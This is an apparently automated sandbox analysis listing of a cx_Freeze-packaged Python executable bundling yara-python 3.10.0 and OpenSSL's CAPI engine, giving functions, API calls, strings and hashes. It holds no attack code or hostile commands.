..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02CA0AB6, 02CA0B49, 02CA0B59, 02CA0BB2, 02CA0C03, 02CA0C34
, xrefs: 02CA0B70
capi_get_key, contname=%s, provname=%s, type=%d, xrefs: 02CA0B38

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: AcquireContextCryptErrorLast
String ID: $..\..\openssl-1.1.0e\engines\e_capi.c$capi_get_key, contname=%s, RSA_AES_CSP$capi_get_key, contname=%s, provname=%s, type=%d
API String ID: 2322988497-2057759941
Opcode ID: 07ac53962dab124e781b8491697e07d49b1900e97c270306ac7698068ef10f29
Instruction ID: ae33f2f57cfc5102bf811e6c54f981cf54506b6cc02f90eef5600b65fc19f98c
Opcode Fuzzy Hash: 07ac53962dab124e781b8491697e07d49b1900e97c270306ac7698068ef10f29
Instruction Fuzzy Hash: 0C4107B1B84300AFE7109F64BC89F2B7399AF84B5CF10091EF54996A40E7B1DA14CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02C46250, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

SeDebugPrivilege, xrefs: 02C5E801

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID: SeDebugPrivilege
API String ID: 4292702814-2896544425
Opcode ID: 5a8753d66acb11f8b665ac3c540febdb14e338991fdae19d38458aa9ab3a4777
Instruction ID: 6805255f1851869cf08365f21ba62034d83a81e84f89e430dfe9d138d6100220
Opcode Fuzzy Hash: 5a8753d66acb11f8b665ac3c540febdb14e338991fdae19d38458aa9ab3a4777
Instruction Fuzzy Hash: 8231B0B0A44300AFD350DF58C848B57BBE4BF88704F5489ADF9498B2A1E734D644CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02CA0E90, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 131encryptionCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02CA0ED1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,?,000000FF,00000000,00000000), ref: 02CA0EF4
CryptAcquireContextW.ADVAPI32(?,00000000,?,?,F0000000,?,000000FF,?,00000000,?,000000FF,00000000,00000000), ref: 02CA0F12
CryptReleaseContext.ADVAPI32(?,00000000,?,?,F0000000,?,000000FF,?,00000000,?,000000FF,00000000,00000000), ref: 02CA0F22
GetLastError.KERNEL32 ref: 02CA0FB1

Strings

capi_ctx_set_provname, name=%s, type=%d, xrefs: 02CA0EB1
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02CA0F30, 02CA0F60, 02CA0F9F, 02CA0FDD

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharContextCryptMultiWide$AcquireErrorLastRelease
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c$capi_ctx_set_provname, name=%s, type=%d
API String ID: 2868654666-2278323642
Opcode ID: 356eccb80935be1451620d028d2f93ca43d19bbd10f8ee2cab20a57a0b7d634b
Instruction ID: ed70b577f0bb4fc4b853064b191840d8c1d9d241cf6c540923791640e911eaad
Opcode Fuzzy Hash: 356eccb80935be1451620d028d2f93ca43d19bbd10f8ee2cab20a57a0b7d634b
Instruction Fuzzy Hash: 8941B671F80304ABEB60DF64AC45FAB73A9EF84754F104515BA09EB7C0DEB19A248BD1

Uniqueness

Uniqueness Score: -1.00%

Function 02CFAD3E, Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02CFB43B
_crt_debugger_hook.MSVCR90(00000001), ref: 02CFB448
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02CFB450
UnhandledExceptionFilter.KERNEL32(02D42D88), ref: 02CFB45B
_crt_debugger_hook.MSVCR90(00000001), ref: 02CFB46C
GetCurrentProcess.KERNEL32(C0000409), ref: 02CFB477
TerminateProcess.KERNEL32(00000000), ref: 02CFB47E

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID:
API String ID: 3369434319-0
Opcode ID: 8e13a858a9fe56ceaae92b66e9fcb4ad2b68e7f0a657c8ed9478e2ff81e1ea93
Instruction ID: 9922d60579f108af45dad680095d3d86ba05c0d2926627d845c87863ab3c6e93
Opcode Fuzzy Hash: 8e13a858a9fe56ceaae92b66e9fcb4ad2b68e7f0a657c8ed9478e2ff81e1ea93
Instruction Fuzzy Hash: BA2100B4D88324CFE780DF28E4446143BB8BB18705F90491AE65987348EBF4AEA5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00401A91, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001A4F), ref: 00401A96

Memory Dump Source

Source File: 00000003.00000002.486851611.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.486844307.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486858661.0000000000402000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486865936.0000000000403000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486876464.0000000000404000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bc793ea0ec81446bfe52092b84c0d95178f3609c5f0b904cfea90c39d9163c1a
Instruction ID: 6236c6d622467902834ac6348df7dbe7a872db4e9874ce3fbb0a4945a65c5e8a
Opcode Fuzzy Hash: bc793ea0ec81446bfe52092b84c0d95178f3609c5f0b904cfea90c39d9163c1a
Instruction Fuzzy Hash: 269002707522404BC64517745F0E60525D15A9C70275124726211E44E4DAB444049919

Uniqueness

Uniqueness Score: -1.00%

Function 02C36FD0, Relevance: 94.9, APIs: 32, Strings: 31, Instructions: 374COMMON

Download Yara Rule

APIs

_snprintf.MSVCR90 ref: 02C37000
_snprintf.MSVCR90 ref: 02C37020
_snprintf.MSVCR90 ref: 02C37040
_snprintf.MSVCR90 ref: 02C37060
_snprintf.MSVCR90 ref: 02C37080
_snprintf.MSVCR90 ref: 02C370A0
_snprintf.MSVCR90 ref: 02C370C0
_snprintf.MSVCR90 ref: 02C370E0
_snprintf.MSVCR90 ref: 02C37100
_snprintf.MSVCR90 ref: 02C37120
_snprintf.MSVCR90 ref: 02C37140
_snprintf.MSVCR90 ref: 02C37160
_snprintf.MSVCR90 ref: 02C37180
_snprintf.MSVCR90 ref: 02C371A0
_snprintf.MSVCR90 ref: 02C371B9
_snprintf.MSVCR90 ref: 02C371D2
_snprintf.MSVCR90 ref: 02C371EB
_snprintf.MSVCR90 ref: 02C37204
_snprintf.MSVCR90 ref: 02C3721D
_snprintf.MSVCR90 ref: 02C3723D
_snprintf.MSVCR90 ref: 02C3725D
_snprintf.MSVCR90 ref: 02C37276
_snprintf.MSVCR90 ref: 02C37296
_snprintf.MSVCR90 ref: 02C372AF
_snprintf.MSVCR90 ref: 02C372CF
_snprintf.MSVCR90 ref: 02C372E8
_snprintf.MSVCR90 ref: 02C37301
_snprintf.MSVCR90 ref: 02C3731A
_snprintf.MSVCR90 ref: 02C37333
_snprintf.MSVCR90 ref: 02C37364
_snprintf.MSVCR90 ref: 02C37384
_snprintf.MSVCR90 ref: 02C3739D

Strings

could not read file, xrefs: 02C37396
include circular reference, xrefs: 02C371CB
duplicated identifier "%s", xrefs: 02C37019
undefined identifier "%s", xrefs: 02C370D9
'for <quantifier> of <string set>' loops can't be nested, xrefs: 02C37216
duplicated structure member, xrefs: 02C3726F
wrong return type for overloaded function, xrefs: 02C372A8
invalid field name "%s", xrefs: 02C37199
"%s" is not a structure, xrefs: 02C37139
duplicated loop identifier "%s", xrefs: 02C37099
integer overflow in "%s", xrefs: 02C3737D
unknown module "%s", xrefs: 02C37236
regular expression is too complex, xrefs: 02C3732C
undefined string "%s", xrefs: 02C370B9
duplicated tag identifier "%s", xrefs: 02C37059
wrong use of anonymous string, xrefs: 02C371B2
regular expression is too large, xrefs: 02C37313
duplicated string identifier "%s", xrefs: 02C37039
loop nesting limit exceeded, xrefs: 02C371FD
too many strings in rule "%s" (limit: %d), xrefs: 02C3735D
not enough memory, xrefs: 02C36FF9
too many levels of included rules, xrefs: 02C371E4
wrong arguments for function "%s", xrefs: 02C3728F
"%s" is not a function, xrefs: 02C37179
empty string "%s", xrefs: 02C37119
division by zero, xrefs: 02C372FA
duplicated metadata identifier "%s", xrefs: 02C37079
invalid module name "%s", xrefs: 02C37256
internal fatal error, xrefs: 02C372E1
"%s" is not an array or dictionary, xrefs: 02C37159
unreferenced string "%s", xrefs: 02C370F9

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: _snprintf
String ID: "%s" is not a function$"%s" is not a structure$"%s" is not an array or dictionary$'for <quantifier> of <string set>' loops can't be nested$could not read file$division by zero$duplicated identifier "%s"$duplicated loop identifier "%s"$duplicated metadata identifier "%s"$duplicated string identifier "%s"$duplicated structure member$duplicated tag identifier "%s"$empty string "%s"$include circular reference$integer overflow in "%s"$internal fatal error$invalid field name "%s"$invalid module name "%s"$loop nesting limit exceeded$not enough memory$regular expression is too complex$regular expression is too large$too many levels of included rules$too many strings in rule "%s" (limit: %d)$undefined identifier "%s"$undefined string "%s"$unknown module "%s"$unreferenced string "%s"$wrong arguments for function "%s"$wrong return type for overloaded function$wrong use of anonymous string
API String ID: 3512837008-3960654680
Opcode ID: 80c759e7b127e2aa303983fce2bb0ea70072fbd008202493a70917b10528b70a
Instruction ID: 3c50ecd879d80aa55c53c23a04e961d21bf9416b6766386a3908b446d9e3ac9e
Opcode Fuzzy Hash: 80c759e7b127e2aa303983fce2bb0ea70072fbd008202493a70917b10528b70a
Instruction Fuzzy Hash: A5A184327441216BE680DB5CFC09DDFB7ACDFD1E15B040527F64AD3311C6609EAA86EA

Uniqueness

Uniqueness Score: -1.00%

Function 02C328A0, Relevance: 85.9, APIs: 25, Strings: 24, Instructions: 144COMMON

Download Yara Rule

APIs

Py_InitModule4.PYTHON27(yara,02D45E40,This module allows you to apply YARA rules to files or strings.For complete documentation please visit:https://plusvic.github.io/yara,00000000,000003F5), ref: 02C328B7
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_CONTINUE,00000000), ref: 02C328DA
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_ABORT,00000001), ref: 02C328E4
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_MATCHES,00000001), ref: 02C328EE
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_NON_MATCHES,00000002), ref: 02C328F8
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_ALL,00000003), ref: 02C32902
PyModule_AddStringConstant.PYTHON27(00000000,__version__,3.10.0), ref: 02C32915
PyModule_AddStringConstant.PYTHON27(00000000,YARA_VERSION,3.10.0), ref: 02C32925
PyModule_AddIntConstant.PYTHON27(00000000,YARA_VERSION_HEX,00030A00), ref: 02C32932
PyErr_NewException.PYTHON27(yara.Error,?,00000000), ref: 02C32949
PyErr_NewException.PYTHON27(yara.SyntaxError,00000000,00000000,?,00000000), ref: 02C32958
PyErr_NewException.PYTHON27(yara.TimeoutError,02999790,00000000,?,00000000), ref: 02C3296D
PyErr_NewException.PYTHON27(yara.WarningError,02999790,00000000,?,00000000), ref: 02C32981
PyType_Ready.PYTHON27(02D45310), ref: 02C32996
PyType_Ready.PYTHON27(02D45450), ref: 02C329A8
PyType_Ready.PYTHON27(02D45188), ref: 02C329BA
PyModule_AddObject.PYTHON27(00000000,Rule,02D45310), ref: 02C329D8
PyModule_AddObject.PYTHON27(00000000,Rules,02D45450), ref: 02C329E5
PyModule_AddObject.PYTHON27(00000000,Match,02D45188), ref: 02C329F2
PyModule_AddObject.PYTHON27(00000000,Error,02999790), ref: 02C32A01
PyModule_AddObject.PYTHON27(00000000,SyntaxError,02999968), ref: 02C32A10
PyModule_AddObject.PYTHON27(00000000,TimeoutError,02999B40), ref: 02C32A1E
PyModule_AddObject.PYTHON27(00000000,WarningError,02999D18), ref: 02C32A30

Part of subcall function 02C43930: _time64.MSVCR90 ref: 02C43949
Part of subcall function 02C43930: srand.MSVCR90 ref: 02C43950
Part of subcall function 02C43930: tolower.MSVCR90 ref: 02C43994

PyErr_SetString.PYTHON27(02999790,initialization error), ref: 02C32A4A
Py_AtExit.PYTHON27(02C32890), ref: 02C32A5C

Strings

yara.WarningError, xrefs: 02C3297C
YARA_VERSION, xrefs: 02C3291F
This module allows you to apply YARA rules to files or strings.For complete documentation please visit:https://plusvic.github.io/yara, xrefs: 02C328A8
yara.Error, xrefs: 02C32944
Rules, xrefs: 02C329DF
Match, xrefs: 02C329EC
CALLBACK_ALL, xrefs: 02C328FC
SyntaxError, xrefs: 02C32A0A
yara.SyntaxError, xrefs: 02C3294E
Error, xrefs: 02C329FB
TimeoutError, xrefs: 02C32A18
initialization error, xrefs: 02C32A44
Rule, xrefs: 02C329D2
CALLBACK_CONTINUE, xrefs: 02C328D4
CALLBACK_NON_MATCHES, xrefs: 02C328F2
yara, xrefs: 02C328B2
CALLBACK_MATCHES, xrefs: 02C328E8
3.10.0, xrefs: 02C3290A
CALLBACK_ABORT, xrefs: 02C328DE
__version__, xrefs: 02C3290F
YARA_VERSION_HEX, xrefs: 02C3292C
yara.TimeoutError, xrefs: 02C32963
WarningError, xrefs: 02C32A2A
3.10.0, xrefs: 02C3291A

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Module_$Constant$Object$Err_$Exception$ReadyStringType_$ExitInitModule4_time64srandtolower
String ID: 3.10.0$3.10.0$CALLBACK_ABORT$CALLBACK_ALL$CALLBACK_CONTINUE$CALLBACK_MATCHES$CALLBACK_NON_MATCHES$Error$Match$Rule$Rules$SyntaxError$This module allows you to apply YARA rules to files or strings.For complete documentation please visit:https://plusvic.github.io/yara$TimeoutError$WarningError$YARA_VERSION$YARA_VERSION_HEX$__version__$initialization error$yara$yara.Error$yara.SyntaxError$yara.TimeoutError$yara.WarningError
API String ID: 4234569520-1936999633
Opcode ID: cf41675d3a6eb5627d435589c7eabb4a4ef2be8270cd4decfe2ed6e735c463a0
Instruction ID: 97247b8369578cfbe8d22b971d2fa94d54db16b8a27f99991345354675847fe6
Opcode Fuzzy Hash: cf41675d3a6eb5627d435589c7eabb4a4ef2be8270cd4decfe2ed6e735c463a0
Instruction Fuzzy Hash: A341D731BC13147BF111A7247C06F9E635CDFA5A44F950511FA03663C0DEE0AE1D8AAB

Uniqueness

Uniqueness Score: -1.00%

Function 02C32060, Relevance: 77.5, APIs: 33, Strings: 11, Instructions: 477COMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27(?,?,|ssOOOOOOO,02D45ADC,?,?,?,?,?,?,?,?,?), ref: 02C320D4
PyObject_IsTrue.PYTHON27(?), ref: 02C32132
PyObject_IsTrue.PYTHON27(?), ref: 02C32163
PyCallable_Check.PYTHON27(?), ref: 02C32185
PyErr_Format.PYTHON27(?,'include_callback' must be callable,?), ref: 02C321BB

Strings

'file' is not a file object, xrefs: 02C3232B
keys and values of the 'sources' dictionary must be of string type, xrefs: 02C323D0
compile() takes 1 argument, xrefs: 02C32598
'error_on_warning' param must be of boolean type, xrefs: 02C321AD
'sources' must be a dictionary, xrefs: 02C323E1
'include_callback' must be callable, xrefs: 02C3219C
filepaths must be a dictionary, xrefs: 02C32571
'externals' must be a dictionary, xrefs: 02C32250
'includes' param must be of boolean type, xrefs: 02C321D4
|ssOOOOOOO, xrefs: 02C320A1
keys and values of the filepaths dictionary must be of string type, xrefs: 02C3255D

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Object_True$Arg_Callable_CheckErr_FormatKeywords_ParseSizeTuple
String ID: 'error_on_warning' param must be of boolean type$'externals' must be a dictionary$'file' is not a file object$'include_callback' must be callable$'includes' param must be of boolean type$'sources' must be a dictionary$compile() takes 1 argument$filepaths must be a dictionary$keys and values of the 'sources' dictionary must be of string type$keys and values of the filepaths dictionary must be of string type$|ssOOOOOOO
API String ID: 4212806499-3333253616
Opcode ID: 708e0e5b13365445ddbdeb7095cd0f857bd70af49b9a0fbef6c3730c69e4d5dc
Instruction ID: 4c49e2c5f31b8bad97b1cb9d7c8b0784f5540184f99a2ddc5a30b3308aac2b39
Opcode Fuzzy Hash: 708e0e5b13365445ddbdeb7095cd0f857bd70af49b9a0fbef6c3730c69e4d5dc
Instruction Fuzzy Hash: 00F17EB6A04304ABC611DF64EC84D6BB7A9BFC4654F444D1DF94A83201E731EE58CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00401300, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 217COMMON

Download Yara Rule

APIs

PyErr_ExceptionMatches.PYTHON27 ref: 0040130B
PyErr_Fetch.PYTHON27(?,?,?), ref: 00401332
PyErr_NormalizeException.PYTHON27(?,?,?), ref: 00401347
PyTuple_New.PYTHON27(00000003), ref: 0040134F

Part of subcall function 004011B0: PyErr_Fetch.PYTHON27(?,?,?), ref: 004011C5
Part of subcall function 004011B0: PyErr_NormalizeException.PYTHON27(?,?,?), ref: 004011DA
Part of subcall function 004011B0: PyObject_GetAttrString.PYTHON27(?,caption), ref: 004011F0
Part of subcall function 004011B0: PyErr_Clear.PYTHON27 ref: 0040120D
Part of subcall function 004011B0: PyString_FromString.PYTHON27(cx_Freeze: Application Terminated), ref: 00401214
Part of subcall function 004011B0: MessageBoxA.USER32 ref: 00401230
Part of subcall function 004011B0: Py_Finalize.PYTHON27 ref: 00401236

Strings

cx_Freeze: Python error in main script, xrefs: 00401518
Exception raised when calling format_exception., xrefs: 00401487
Error in sys.excepthook., xrefs: 004013FB
format_exception, xrefs: 0040144A
Cannot join exception strings., xrefs: 004014DE
Cannot import traceback module., xrefs: 0040142F
__excepthook__, xrefs: 004013D4
Cannot create default caption string., xrefs: 0040152A
traceback, xrefs: 00401419
Cannot create args tuple., xrefs: 00401362
Cannot get format_exception method., xrefs: 0040145D
caption, xrefs: 004014F7
Cannot create empty string object., xrefs: 004014B4
excepthook, xrefs: 004013CA

Memory Dump Source

Source File: 00000003.00000002.486851611.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.486844307.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486858661.0000000000402000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486865936.0000000000403000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486876464.0000000000404000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_$Exception$FetchNormalizeString$AttrClearFinalizeFromMatchesMessageObject_String_Tuple_
String ID: Cannot create args tuple.$Cannot create default caption string.$Cannot create empty string object.$Cannot get format_exception method.$Cannot import traceback module.$Cannot join exception strings.$Error in sys.excepthook.$Exception raised when calling format_exception.$__excepthook__$caption$cx_Freeze: Python error in main script$excepthook$format_exception$traceback
API String ID: 1837309608-3274835067
Opcode ID: 4ce9360196651ec0ad702735b428182a8e9a5ea23dc1c7c0c6a4c5454061827b
Instruction ID: 0aab367f8455c534eb5d763ef7a6d743646a44998664c9bb15ed48c7101f5bd0
Opcode Fuzzy Hash: 4ce9360196651ec0ad702735b428182a8e9a5ea23dc1c7c0c6a4c5454061827b
Instruction Fuzzy Hash: 93511636A403009BC600DB64BD4566B33A4FA84766B08443BFE45B73E1E67DE61DC7AB

Uniqueness

Uniqueness Score: -1.00%

Function 02C331C1, Relevance: 40.6, APIs: 15, Strings: 8, Instructions: 340COMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27 ref: 02C3325C
PyErr_Format.PYTHON27(?,'externals' must be a dictionary,?,?,?,?,?,?,?,?,?,?,?), ref: 02C3328D
PyCallable_Check.PYTHON27(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C332AD
PyErr_Format.PYTHON27(20000000,'modules_data' must be a dictionary,?,?,?,?,?,?,?,?,?,?,?), ref: 02C332C3
PyCallable_Check.PYTHON27(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C332DD
PyErr_Format.PYTHON27(00000000,'modules_callback' must be callable), ref: 02C332F4

Strings

'callback' must be callable, xrefs: 02C332B6
|sis#OOOiOOi, xrefs: 02C3321D
<data>, xrefs: 02C334F3
'modules_callback' must be callable, xrefs: 02C332EE
'externals' must be a dictionary, xrefs: 02C33368
'modules_data' must be a dictionary, xrefs: 02C3331A
<proc>, xrefs: 02C33511
match() takes at least one argument, xrefs: 02C3327F

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format$Callable_Check$Arg_Keywords_ParseSizeTuple
String ID: 'callback' must be callable$'externals' must be a dictionary$'modules_callback' must be callable$'modules_data' must be a dictionary$<data>$<proc>$match() takes at least one argument$|sis#OOOiOOi
API String ID: 1778487156-647612975
Opcode ID: 4ec78fba2b55abc3fabc170ceb3b572587ad1b3f057ef39078d4b7dd71efc9f8
Instruction ID: c9ce353c8ff44c4108b231dfafb8805701112ef90dfe34d49af771653dd6ba51
Opcode Fuzzy Hash: 4ec78fba2b55abc3fabc170ceb3b572587ad1b3f057ef39078d4b7dd71efc9f8
Instruction Fuzzy Hash: A7A19076A04344AFD311DF64E88495BB7E8FBC8614F844E2EF949C3210DB35EA59CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C32610, Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 217threadCOMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27(?,?,|sO,02D45CDC,?,?), ref: 02C32642
PyObject_Malloc.PYTHON27(00000014,02D45450), ref: 02C3266C
PyObject_Init.PYTHON27(00000000), ref: 02C32676
PyEval_SaveThread.PYTHON27 ref: 02C3268B
PyEval_RestoreThread.PYTHON27(?,?,0000000C), ref: 02C326AC

Strings

|sO, xrefs: 02C32631
<file-like-object>, xrefs: 02C3276F
load() expects either a file path or a file-like object, xrefs: 02C3285C
read, xrefs: 02C32700

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Eval_Object_Thread$Arg_InitKeywords_MallocParseRestoreSaveSizeTuple
String ID: <file-like-object>$load() expects either a file path or a file-like object$read$|sO
API String ID: 2305183799-969849776
